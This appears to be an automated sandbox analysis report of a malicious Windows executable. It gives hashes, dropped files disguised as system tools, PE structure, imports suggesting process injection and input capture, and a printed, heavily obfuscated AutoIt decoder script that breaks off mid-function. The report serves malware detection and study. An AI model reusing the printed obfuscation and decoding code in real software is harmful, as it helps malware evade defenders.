                                                  Preview: L..................F.... ...D..*Q....@.*Q....@.*Q...@*......................j.:..DG..Yr?.D..U..k0.&...&...........-..D..*Q.....*Q.......t...CFSF..1.....tQ.{..hdwwiz....t.Y^...H.g.3..(.....gVA.G..k...>......tQ.{tQ.{.....d...................... .h.d.w.w.i.z...B...2.@*..tQ.{ .DIAGNO~1.BAT.........tQ.{tQ.{.....e.....................g..D.i.a.g.n.o.s.t.i.c.s.H.u.b...S.t.a.n.d.a.r.d.C.o.l.l.e.c.t.o.r...S.e.r.v.i.c.e...e.x.e...b.a.t.......u...............-.......t...........i........C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat..L.....\.....\.....\.....\.....\.....\.....\.h.d.w.w.i.z.\.D.i.a.g.n.o.s.t.i.c.s.H.u.b...S.t.a.n.d.a.r.d.C.o.l.l.e.c.t.o.r...S.e.r.v.i.c.e...e.x.e...b.a.t.........|....I.J.H..K..:...`.......X.......562258...........!a..%.H.VZAj...R..-.........-..!a..%.H.VZAj...R..-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH
                                                  C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat
                                                  Process:C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1124928
                                                  Entropy (8bit):7.084344199511202
                                                  Encrypted:false
                                                  SSDEEP:24576:16bH5wWsN1Qy5WlLVVCj3jtmHanc5vuZoX2lPA5L:05BysTV23RYanc5vmo2uL
                                                  MD5:F660ED54597E4FF5354B557329CAB70D
                                                  SHA1:6222B1BD8920FA8FAD0507278E563E1736EBC257
                                                  SHA-256:B242D6C625537AC1CF52752A1997C035063C8E4B5648C41D443A2926F7C599E5
                                                  SHA-512:A26BEB3E4F4B52A441D53BB901B6886897CE388608B5DF9F98709F76719C5F02724DFB61C784F792629975EACA8BCB51319203C17BCED969669D53794A0CD68A
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Reputation:low
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L......\.........."..........@....................@.................................p.....@...@.......@.........................|........|......................4q...+..............................PK..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc....|.......~...4..............@..@.reloc..4q.......r..................@..B........................................................................................................................................................................................................................................................................................
                                                  \Device\ConDrv
                                                  Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1010
                                                  Entropy (8bit):4.298581893109255
                                                  Encrypted:false
                                                  SSDEEP:24:zKTDwL/0XZd3Wo3opQ5ZKBQFYVgt7ovrNOYlK:zKTDwAXZxo4ABV+SrUYE
                                                  MD5:367EEEC425FE7E80B723298C447E2F22
                                                  SHA1:3873DFC88AF504FF79231FE2BF0E3CD93CE45195
                                                  SHA-256:481A7A3CA0DD32DA4772718BA4C1EF3F01E8D184FE82CF6E9C5386FD343264BC
                                                  SHA-512:F7101541D87F045E9DBC45941CDC5A7F97F3EFC29AC0AF2710FC24FA64F0163F9463DE373A5D2BE1270126829DE81006FB8E764186374966E8D0E9BB35B7D7D6
                                                  Malicious:false
                                                  Preview: Microsoft (R) .NET Framework Assembly Registration Utility 2.0.50727.8922..Copyright (C) Microsoft Corporation 1998-2004. All rights reserved.....Syntax: RegAsm AssemblyName [Options]..Options:.. /unregister Unregister types.. /tlb[:FileName] Export the assembly to the specified type library.. and register it.. /regfile[:FileName] Generate a reg file with the specified name.. instead of registering the types. This option.. cannot be used with the /u or /tlb options.. /codebase Set the code base in the registry.. /registered Only refer to already registered type libraries.. /asmpath:Directory Look for assembly references here.. /nologo Prevents RegAsm from displaying logo.. /silent Silent mode. Prevents displaying of success messages.. /verbose Displays extra information.. /? or /help Display this usage

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):7.084338376698759
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:d4e475d7d17a16be8b9eeac6e10b25af.exe
                                                  File size:1124920
                                                  MD5:5162337b6fd4c8806ef62f6ebf4a5df8
                                                  SHA1:126642db1117de853d7e0ae601e0ff45358d7413
                                                  SHA256:9c2e4a4a0e7bb4c3c47ca33ec0d0c377fa38e0ae498721062432648ebf060a10
                                                  SHA512:cebb47171a6a97dc9cdd52ad14561e032732a6c405a3e8f103508255ac45e8f210a2bc5c82ea2320d279809a519cf4182cad7d5a58899f84669ef0244de5c81f
                                                  SSDEEP:24576:16bH5wWsN1Qy5WlLVVCj3jtmHanc5vuZoX2lPA5w:05BysTV23RYanc5vmo2uw
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                                                  File Icon

                                                  Icon Hash:aab2e3e39383aa00

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x42800a
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                  DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE
                                                  Time Stamp:0x5CF3C8E6 [Sun Jun 2 13:02:30 2019 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:1
                                                  File Version Major:5
                                                  File Version Minor:1
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:1
                                                  Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                  Entrypoint Preview

                                                  Instruction
                                                  call 00007F2A60799B7Dh
                                                  jmp 00007F2A6078C934h
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  push edi
                                                  push esi
                                                  mov esi, dword ptr [esp+10h]
                                                  mov ecx, dword ptr [esp+14h]
                                                  mov edi, dword ptr [esp+0Ch]
                                                  push ecx
                                                  pop eax
                                                  push ecx
                                                  pop edx
                                                  add eax, esi
                                                  cmp edi, esi
                                                  jbe 00007F2A6078CABAh
                                                  cmp edi, eax
                                                  jc 00007F2A6078CE1Eh
                                                  bt dword ptr [004C41FCh], 01h
                                                  jnc 00007F2A6078CAB9h
                                                  rep movsb
                                                  jmp 00007F2A6078CDCCh
                                                  cmp ecx, 00000080h
                                                  jc 00007F2A6078CC84h
                                                  push edi
                                                  pop eax
                                                  xor eax, esi
                                                  test eax, 0000000Fh
                                                  jne 00007F2A6078CAC0h
                                                  bt dword ptr [004BF324h], 01h
                                                  jc 00007F2A6078CF90h
                                                  bt dword ptr [004C41FCh], 00000000h
                                                  jnc 00007F2A6078CC5Dh
                                                  test edi, 00000003h
                                                  jne 00007F2A6078CC6Eh
                                                  test esi, 00000003h
                                                  jne 00007F2A6078CC4Dh
                                                  bt edi, 02h
                                                  jnc 00007F2A6078CABFh
                                                  mov eax, dword ptr [esi]
                                                  sub ecx, 04h
                                                  lea esi, dword ptr [esi+04h]
                                                  mov dword ptr [edi], eax
                                                  lea edi, dword ptr [edi+04h]
                                                  bt edi, 03h
                                                  jnc 00007F2A6078CAC3h
                                                  movq xmm1, qword ptr [esi]
                                                  sub ecx, 08h
                                                  lea esi, dword ptr [esi+08h]
                                                  movq qword ptr [edi], xmm1
                                                  lea edi, dword ptr [edi+08h]
                                                  test esi, 00000007h
                                                  je 00007F2A6078CB15h
                                                  bt esi, 03h

                                                  Rich Headers

                                                  Programming Language:
                                                  • [ C ] VS2013 build 21005
                                                  • [ C ] VS2008 SP1 build 30729
                                                  • [LNK] VS2013 UPD5 build 40629
                                                  • [ASM] VS2013 UPD5 build 40629
                                                  • [C++] VS2013 build 21005
                                                  • [ASM] VS2013 build 21005
                                                  • [RES] VS2013 build 21005
                                                  • [IMP] VS2008 SP1 build 30729

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x47cbc.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1100000x7134.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000x8dfdd0x8e000False0.582306338028data6.72346657583IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                  .rdata0x8f0000x2fd8e0x2fe00False0.328288185379data5.76324400576IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data0xbf0000x8f740x5200False0.10175304878data1.19638192355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                  .rsrc0xc80000x47cbc0x47e00False0.908023097826data7.84935069972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0x1100000x71340x7200False0.761753015351data6.78395555713IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountry
                                                  RT_ICON0xc85e80x128GLS_BINARY_LSB_FIRSTEnglishGreat Britain
                                                  RT_ICON0xc87100x128GLS_BINARY_LSB_FIRSTEnglishGreat Britain
                                                  RT_ICON0xc88380x128GLS_BINARY_LSB_FIRSTEnglishGreat Britain
                                                  RT_ICON0xc89600x2e8dataEnglishGreat Britain
                                                  RT_ICON0xc8c480x128GLS_BINARY_LSB_FIRSTEnglishGreat Britain
                                                  RT_ICON0xc8d700xea8dataEnglishGreat Britain
                                                  RT_ICON0xc9c180x8a8dBase III DBT, version number 0, next free block index 40EnglishGreat Britain
                                                  RT_ICON0xca4c00x568GLS_BINARY_LSB_FIRSTEnglishGreat Britain
                                                  RT_ICON0xcaa280x25a8dBase III DBT, version number 0, next free block index 40EnglishGreat Britain
                                                  RT_ICON0xccfd00x10a8dataEnglishGreat Britain
                                                  RT_ICON0xce0780x468GLS_BINARY_LSB_FIRSTEnglishGreat Britain
                                                  RT_MENU0xce4e00x50dataEnglishGreat Britain
                                                  RT_STRING0xce5300x594dataEnglishGreat Britain
                                                  RT_STRING0xceac40x68adataEnglishGreat Britain
                                                  RT_STRING0xcf1500x490dataEnglishGreat Britain
                                                  RT_STRING0xcf5e00x5fcdataEnglishGreat Britain
                                                  RT_STRING0xcfbdc0x65cdataEnglishGreat Britain
                                                  RT_STRING0xd02380x466dataEnglishGreat Britain
                                                  RT_STRING0xd06a00x158dataEnglishGreat Britain
                                                  RT_RCDATA0xd07f80x2bef0data
                                                  RT_RCDATA0xfc6e80x13052data
                                                  RT_GROUP_ICON0x10f73c0x76dataEnglishGreat Britain
                                                  RT_GROUP_ICON0x10f7b40x14dataEnglishGreat Britain
                                                  RT_GROUP_ICON0x10f7c80x14dataEnglishGreat Britain
                                                  RT_GROUP_ICON0x10f7dc0x14dataEnglishGreat Britain
                                                  RT_VERSION0x10f7f00xdcdataEnglishGreat Britain
                                                  RT_MANIFEST0x10f8cc0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain

                                                  Imports

                                                  DLLImport
                                                  WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                  VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                  COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                  MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                  WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                  PSAPI.DLLGetProcessMemoryInfo
                                                  IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                  USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                  UxTheme.dllIsThemeActive
                                                  KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                  USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                  GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                  COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                  ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                  SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                  OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                  Version Infos

                                                  DescriptionData
                                                  Translation0x0809 0x04b0

                                                  Possible Origin

                                                  Language of compilation systemCountry where language is spokenMap
                                                  EnglishGreat Britain

                                                  Static AutoIT Info

                                                  General

                                                  Code:LOCAL $NSFYZHFKYP = EXECUTE LOCAL $EOERUAQRJSKN = $NSFYZHFKYP ("DllStructGetData" ) LOCAL $DWUFUAPKESAJ = $NSFYZHFKYP ("BinaryToString" ) FUNC LUXBZMCWKPOC ($STEXT , $SYMBOL ) GLOBAL $1300820860 = 256356752 GLOBAL $MIFHIFVYOW = 1654813 FOR $E = 0 TO 1029680 IF $1300820860 = 176683708 THEN RETURN $RESULT WINEXISTS ("cNl3R229gAzqAgEuzKzVWCOcVIa32WhXtsmSQFEqNhbfvHYqV7k4qjZJ9iii19hutL7h3WO4f" ) EXITLOOP ENDIF IF $1300820860 = 256356752 THEN $RESULT = STRINGREPLACE ($STEXT , $SYMBOL , "" ) ISBOOL (818823 * 493411 * 2406282 + 2130956 ) $1300820860 = 176683708 ISSTRING ("yNaRVUKQw8rqYhclizB6xh2lTgeXOqeiGTUCNTY6Kewi" ) ENDIF STRING ("rDseA9qWY8OOX" ) NEXT ENDFUNC FUNC EWYPFYGPXIKHY ($IMGFULLPATH ) GLOBAL $1138660241 = 256356752 GLOBAL $G4JUFXIGZL = 90924 FOR $E = 0 TO 2054991 IF $1138660241 = 113519199 THEN GUIDELETE ($HWND ) ISBOOL ("OQwXVdfTCRZVjrYdqoDJsbHUeRIgQEdpJ59hNsifNw42SNBnFpEDeYANiLTeE8c7MJknrRy7fy66gOczouJAaI" ) $1138660241 = 1027989821 RANDOM (130856 ) ENDIF IF $1138660241 = 176683708 THEN $HWND = GUICREATE ($IMGFULLPATH , 0 , 0 , 0 , 0 , BITOR (2147483648 , 536870912 ) , BITOR (128 , 32 ) ) ISBOOL (1265171 + 520477 + 4293992654 * 3327821 ) $1138660241 = 1300820860 CHR (2730490 ) ISBOOL ("sZkxL7eyyS6SwwaYpLjA469yVJCkE4aYFBqozrSakTdG9hDkx2L2xcQv0WMbD34ERil4f" ) ENDIF IF $1138660241 = 256356752 THEN LOCAL $HWND , $HGUISWITCH , $ACTRLSIZE , $ARETSIZE [2 ] = [0 , 0 ] RANDOM (3641423 ) $1138660241 = 176683708 ENDIF IF $1138660241 = 1027989821 THEN GUISWITCH ($HGUISWITCH ) EXITLOOP INT (3107136 ) ENDIF IF $1138660241 = 1203322726 THEN $ACTRLSIZE = CONTROLGETPOS ($HWND , "" , GUICTRLCREATEPIC ($IMGFULLPATH , 0 , 0 , 0 , 0 ) ) DIM $DW5YMNQFQYI005IELCM7 = 964435 * 1963137 + 4293423702 + 4294948098 $1138660241 = 113519199 DIM $RNHTSIKWVTNM8WTLIRGN = 647030 ENDIF IF $1138660241 = 1300820860 THEN $HGUISWITCH = GUISWITCH ($HWND ) $1138660241 = 1203322726 CHR (45484 ) ENDIF DIM $URHNA3OSSULYHJVXSX77 = 600218 + 4293462533 + 4294915318 * 2918734 + 4292984733 NEXT IF ISARRAY ($ACTRLSIZE ) THEN GLOBAL $1203322726 = 256356752 GLOBAL $CSY08UBDGU = 2740256 FOR $E = 0 TO 3691754 IF $1203322726 = 176683708 THEN $ARETSIZE [1 ] = $ACTRLSIZE [3 ] $1203322726 = 1300820860 INT (967164 ) ENDIF IF $1203322726 = 256356752 THEN $ARETSIZE [0 ] = $ACTRLSIZE [2 ] $1203322726 = 176683708 ISBOOL ("k2nLrtaqkAvZrMcSm68iRAhbvf6LDlz2qGkcnTjp23hXhFfTjNJ8Ke3TUlqlxxW8bCIV" ) ENDIF IF $1203322726 = 1300820860 THEN RETURN SETERROR (0 , 0 , $ARETSIZE ) EXITLOOP ENDIF MOD (3165406 , 1234085 ) NEXT ENDIF RETURN SETERROR (1 , 0 , $ARETSIZE ) ENDFUNC FUNC VRCRUWMXTTRH ($SSTRING , $IREPEATCOUNT ) $IREPEATCOUNT = INT ($IREPEATCOUNT ) IF STRINGLEN ($SSTRING ) < 1 OR $IREPEATCOUNT < 0 THEN RETURN SETERROR (1 , 0 , "" ) LOCAL $SRESULT = "" WHILE $IREPEATCOUNT > 1 IF BITAND ($IREPEATCOUNT , 1 ) THEN $SRESULT &= $SSTRING GLOBAL $1300820860 = 256356752 GLOBAL $3Z9MCZLBRL = 1285316 FOR $E = 0 TO 2581845 IF $1300820860 = 176683708 THEN $IREPEATCOUNT = BITSHIFT ($IREPEATCOUNT , 1 ) EXITLOOP ISSTRING ("WO7uqjjfl1YfzArAm" ) ENDIF IF $1300820860 = 256356752 THEN $SSTRING &= $SSTRING $1300820860 = 176683708 ISBOOL ("gcRCcY1WQjHo2O6sQGpzxHa1TaVRJjXmCJnnCQdx9cz" ) ENDIF NEXT WEND RETURN $SSTRING & $SRESULT ENDFUNC FUNC QNJARTBHRDOXE ($SSTR ) GLOBAL $1300820860 = 256356752 GLOBAL $OKQZTV9IBZ = 2183390 FOR $E = 0 TO 2966495 IF $1300820860 = 176683708 THEN LOCAL $SDECODED , $R , $RS = 8 , $LS = 7 , $ASTR = STRINGSPLIT ($SSTR , "" , 2 ) EXITLOOP STRING (1180918 * 3350956 + 1885337 ) ENDIF IF $1300820860 = 256356752 THEN LOCAL $SB128 = LUXBZMCWKPOC ("!#..$%..(..)*..,...012345..6..7..89..:..;..=@A..BC..DEFG..H..IJ..K..LMNO..PQRST..U..V..WX..YZ[]^.._..a..bcd..e..f..g..h..i..j..kl..m..n..opqrs..t..u..v..wxy..z..{..|..}~............................................................................................................................................................................................." , ".." ) STRING ("8QBnB8372SKOmN6buZ033HrqhFVqvBuNzq0dJZSnMyCcRVFleBGKEo0Axlg6mMKzx7o5X2BEhMqEfoIvaIm44UilA" ) $1300820860 = 176683708 ENDIF DIM $XCOTFJYLACD17VUJLU5M = "QENYdEwmcVuLqRcI0Zzka42qqnefFX90xJhGb5Cfc97ripROrJV" NEXT FOR $I = 0 TO UBOUND ($ASTR ) + 4294967295 $NC = STRINGINSTR ($SB128 , $ASTR [$I ] , 1 ) + 4294967295 IF $RS > 7 THEN GLOBAL $113519199 = 256356752 GLOBAL $ECZWMWGZZR = 3669754 FOR $E = 0 TO 2777370 IF $113519199 = 176683708 THEN $LS = 7 $113519199 = 1300820860 ISSTRING (3678465 + 4294436102 + 3801172 ) DIM $FYX5BEV5JU4NXMOURSFM = "afWc" ENDIF IF $113519199 = 256356752 THEN $RS = 1 DIM $YZCPFSAEVNRJSFOK3GTQ = 1543249 * 941265 + 1972212 * 2045070 $113519199 = 